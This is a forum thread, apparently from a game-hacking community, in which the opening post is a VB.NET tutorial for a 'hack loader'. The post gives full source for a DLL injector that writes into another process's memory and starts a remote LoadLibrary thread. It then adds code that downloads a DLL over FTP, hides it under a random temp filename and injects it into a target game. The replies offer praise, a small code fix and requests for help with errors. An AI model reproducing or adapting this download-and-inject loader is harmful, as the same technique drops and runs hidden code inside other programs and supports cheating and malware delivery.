[Vb.net]Simple hack loader

[jdslashv2]

Hello, today I'm am going to show you how to make a simple hack loader!

SPECIAL THANKS TO J-DEEZY FOR SOME OF THE CODING AND TO WHO EVER MADE THE DLL INJECTOR CODE!

Needed:

Code:

1 textbox
1 timer

First, you must get the source code for the BASIC DLL injector (PS THIS IS NOT MY CODE):

[php]Public Class Form1

Private TargetProcessHandle As Integer
Private pfnStartAddr As Integer
Private pszLibFileRemote As String
Private TargetBufferSize As Integer

Public Const PROCESS_VM_READ = &H10
Public Const TH32CS_SNAPPROCESS = &H2
Public Const MEM_COMMIT = 4096
Public Const PAGE_READWRITE = 4
Public Const PROCESS_CREATE_THREAD = (&H2)
Public Const PROCESS_VM_OPERATION = (&H8)
Public Const PROCESS_VM_WRITE = (&H20)

Public Declare Function ReadProcessMemory Lib "kernel32" ( _
ByVal hProcess As Integer, _
ByVal lpBaseAddress As Integer, _
ByVal lpBuffer As String, _
ByVal nSize As Integer, _
ByRef lpNumberOfBytesWritten As Integer) As Integer

Public Declare Function LoadLibrary Lib "kernel32" Alias "LoadLibraryA" ( _
ByVal lpLibFileName As String) As Integer

Public Declare Function VirtualAllocEx Lib "kernel32" ( _
ByVal hProcess As Integer, _
ByVal lpAddress As Integer, _
ByVal dwSize As Integer, _
ByVal flAllocationType As Integer, _
ByVal flProtect As Integer) As Integer

Public Declare Function WriteProcessMemory Lib "kernel32" ( _
ByVal hProcess As Integer, _
ByVal lpBaseAddress As Integer, _
ByVal lpBuffer As String, _
ByVal nSize As Integer, _
ByRef lpNumberOfBytesWritten As Integer) As Integer

Public Declare Function GetProcAddress Lib "kernel32" ( _
ByVal hModule As Integer, ByVal lpProcName As String) As Integer

Private Declare Function GetModuleHandle Lib "Kernel32" Alias "GetModuleHandleA" ( _
ByVal lpModuleName As String) As Integer

Public Declare Function CreateRemoteThread Lib "kernel32" ( _
ByVal hProcess As Integer, _
ByVal lpThreadAttributes As Integer, _
ByVal dwStackSize As Integer, _
ByVal lpStartAddress As Integer, _
ByVal lpParameter As Integer, _
ByVal dwCreationFlags As Integer, _
ByRef lpThreadId As Integer) As Integer

Public Declare Function OpenProcess Lib "kernel32" ( _
ByVal dwDesiredAccess As Integer, _
ByVal bInheritHandle As Integer, _
ByVal dwProcessId As Integer) As Integer

Private Declare Function FindWindow Lib "user32" Alias "FindWindowA" ( _
ByVal lpClassName As String, _
ByVal lpWindowName As String) As Integer

Private Declare Function CloseHandle Lib "kernel32" Alias "CloseHandleA" ( _
ByVal hObject As Integer) As Integer


Dim ExeName As String = IO.Path.GetFileNameWithoutExtension(Application.Ex ecutablePath)

Private Sub Inject()
On Error GoTo 1 ' If error occurs, app will close without any error messages
Timer1.Stop()
Dim TargetProcess As Process() = Process.GetProcessesByName("PROCESS NAME HERE")
TargetProcessHandle = OpenProcess(PROCESS_CREATE_THREAD Or PROCESS_VM_OPERATION Or PROCESS_VM_WRITE, False, TargetProcess(0).Id)
pszLibFileRemote = Application.StartupPath & "\" + ExeName + ".dll"
pfnStartAddr = GetProcAddress(GetModuleHandle("Kernel32"), "LoadLibraryA")
TargetBufferSize = 1 + Len(pszLibFileRemote)
Dim Rtn As Integer
Dim LoadLibParamAdr As Integer
LoadLibParamAdr = VirtualAllocEx(TargetProcessHandle, 0, TargetBufferSize, MEM_COMMIT, PAGE_READWRITE)
Rtn = WriteProcessMemory(TargetProcessHandle, LoadLibParamAdr, pszLibFileRemote, TargetBufferSize, 0)
CreateRemoteThread(TargetProcessHandle, 0, 0, pfnStartAddr, LoadLibParamAdr, 0, 0)
CloseHandle(TargetProcessHandle)
1: Me.Close()
End Sub

Private Sub Timer1_Tick(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Timer1.Tick
If IO.File.Exists(Application.StartupPath & "\" + ExeName + ".dll") Then
Dim TargetProcess As Process() = Process.GetProcessesByName("PROCESS NAME HERE")
If TargetProcess.Length = 0 Then
Me.TextBox1.Text = ("Waiting for PROCESS.exe")
Else
Timer1.Stop()
Me.TextBox1.Text = "Done..."
Call Inject()
End If
Else
Me.TextBox1.Text = ("" + ExeName + ".dll not found")
End If
End Sub

Private Sub Form1_Load(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles MyBase.Load
Timer1.Interval = 50
Timer1.Start()
End Sub
[/php]

Now you must add these to the globals:
[php]Private HACK As String = My.Computer.FileSystem.GetTempFileName & Rnd() * 99999 & ".dll"[/php]

And then change:
[php]If IO.File.Exists(Application.StartupPath & "\" + ExeName + ".dll") Then[/php]

To:
And then change:
[php]If IO.File.Exists(HACK) Then[/php]

And under "Else" you add:
[php] Else
Me.TextBox1.Text = ("Downloading...")
Try
Dim httpclient = New Net.WebClient
httpclient.Credentials = New Net.NetworkCredential("ftp_username", "ftp_password")
httpclient.DownloadFile("ftp:/rsite.com/hack.dll", Application.StartupPath & "\hack.dll")
IO.File.Move(Application.StartupPath & "\hack.dll", HACK)
Dim TargetProcess As Process() = Process.GetProcessesByName("PROCESS NAME")
If TargetProcess.Length = 0 Then
Me.TextBox1.Text = ("Waiting for GAME.exe")
Else
Timer1.Stop()
Me.TextBox1.Text = "Done..."
Call Inject()
End If
Catch
MsgBox("Error: " + ErrorToString(), MsgBoxStyle.Critical, "Error")
End Try
End If[/php]

Now at the VERY top, search for:
[php]pszLibFileRemote = Application.StartupPath & "\" + ExeName + ".dll"[/php]

And change it to:
[php]pszLibFileRemote = HACK[/php]

Now you're done! All you need is a hack, an FTP site, and a design for the loader, then you're on your way for anti leeching! Now run and tell that to those choobs out there!

[Jason]

[php]
httpclient.DownloadFile("ftp:/rsite.com/hack.dll", Application.StartupPath & "\hack.dll")
IO.File.Move(Application.StartupPath & "\hack.dll", HACK)
[/php]

The IO.File.Move isn't necessary here, you've declared the "HACK" location already, so just download the file to there.

Gewd jab tho.

P.S - My name is no longer J-Deezy /

[jdslashv2]

The IO.File.Move isn't necessary here, you've declared the "HACK" location already, so just download the file to there.

Gewd jab tho.

P.S - My name is no longer J-Deezy /

well then what do i call ?

[Jason]

well then what do i call ?

Jason?

[jdslashv2]

Jason?

sorry m8 i fail (epically)

[awesomeblack]

Nice job, both of you (:

['Bruno]

No offense -> Tutorials section

[ericsmart]

nice tutorial

[jdslash]

hey thanks

[maneater4122]

Error 1 Comma, ')', or a valid expression continuation expected. C:\Documents and Settings\tina\Local Settings\Application Data\Temporary Projects\loader\Form1.vb 68 80 loader

is the only error i get could someone help?

[xakerino]

Help with errors!!! Imageshack - injectorerrors.png

['Bruno]

Help with errors!!! Imageshack - injectorerrors.png

man you don't know how to code.. That's the problem. Learn first.

[SubjectToKill]

GO GRAB A C++ BOOK AND ACTUALLY READ IT please man i cannot see close enough to see what ur coding/making take it more up close.

[jdslashv2]

this isn't c++, its visual basic. plus he still needs to learn anyway!

[♪~ ᕕ(ᐛ)ᕗ]

The IO.File.Move isn't necessary here, you've declared the "HACK" location already, so just download the file to there.

Gewd jab tho.

P.S - My name is no longer J-Deezy /

wait, wait, wait... You did made this source? OMG! It's everywhere!

Code:

If YouMadeThisSource Then Return ThisIsTheSecondTimeThatIFoundOneOfUrSources 'Lung huh?